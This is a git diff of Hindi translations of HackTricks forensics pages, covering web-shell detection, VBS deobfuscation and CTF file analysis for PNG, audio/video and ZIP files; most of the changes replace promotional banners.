फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** वालों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा। +अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** फ़ाइलों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा। ### सांख्यिकीय विश्लेषण -जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक** शामिल हो सकता है। +जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक वेब शैल सबसे अधिक हो सकता है**। diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 8d30692b2..e3f7397d4 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -यहाँ आप विशेष फ़ाइल प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं: +यहाँ आप विशेष फ़ाइल प्रकारों और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं: {% page-ref page=".pyc.md" %} @@ -37,16 +38,17 @@ HackTricks का समर्थन करने के अन्य तरी +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index 2bb13f8c7..6a7843baf 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} -कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं: +कुछ चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफ़स्केट करने में उपयोगी हो सकती हैं: ## echo ```bash @@ -52,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें** PRs को **HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index f652ffea3..b7250150c 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,35 @@ -
- -जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! - -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। - -
- -**PNG फ़ाइलें** **CTF challenges** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिससे वे छिपी हुई डेटा को एम्बेड करने के लिए आदर्श होती हैं। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छिपे हुए जानकारी या असमान्यताएँ प्रकट करते हैं। - -PNG फ़ाइल की अखंडता की जाँच और क्षति को ठीक करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएँ एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNGs को मरम्मत करने** में, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं। - -ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छिपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्त करने में मदद करती हैं। +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* 💬 **शामिल हों** [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को [**पीआर जमा करके**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} + +**PNG फ़ाइलें** **CTF चैलेंज** में अपने **लॉसलेस कंप्रेशन** के लिए प्रशंसित हैं, जिन्हें छुपी डेटा को एम्बेड करने के लिए आदर्श बनाता है। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा को विश्लेषित करके, छुपे जानकारी या विसंगतियों को प्रकट करते हैं। + +PNG फ़ाइल की अखंडता की जाँच करने और क्षति को मरम्मत करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड-लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएं एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNG की मरम्मत के लिए**, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं। + +ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छुपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्ति करने में मदद करती हैं। + +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +हैकट्रिक्स का समर्थन करें + +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* 💬 **शामिल हों** [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को [**पीआर जमा करके**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में। + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 96a41e1fc..af9a06b0a 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,40 +1,14 @@ -
+{% hint style="success" %} +**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** एक महत्वपूर्ण तकनीक है **CTF फोरेंसिक्स चैलेंजेस** में, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग करके गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं। -जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +ऑडियो चैलेंज के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण करने के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गाने को धीमा करना या उलटा करना छिपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है। -HackTricks का समर्थन करने के अन्य तरीके: +**लीस्ट सिग्निफिकेंट बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग करके डेटा को गुप्त रूप से समाहित करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है। -* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +वीडियो चैलेंज अक्सर ऑडियो और वीडियो स्ट्रीम्स को बंडल करने वाले कंटेनर फ़ॉर्मेट्स को शामिल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेट्स का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है। -
+यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को दर्शाता है, जहां प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा को खोलने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है। -**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक महत्वपूर्ण तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं। - -ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गानों को धीमा करना या उलटना छुपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है। - -**कम सार्वजनिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग गुप्त रूप से डेटा समाहित करने के लिए करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है। - -वीडियो चैलेंज अक्सर कंटेनर फ़ॉर्मेट का सामाग्री जोड़ने वाले होते हैं जो ऑडियो और वीडियो स्ट्रीम्स को बंडल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेटों का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है। - -यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को प्रकट करता है, जहाँ प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा का पता लगाने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है। - -# संदर्भ +## संदर्भ * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - -
- -जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! - -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें। -* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। - -
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index d0478d17f..59eb0832b 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,27 +1,46 @@ -# ZIPs tricks +# ZIPs ट्रिक्स + +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +HackTricks का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
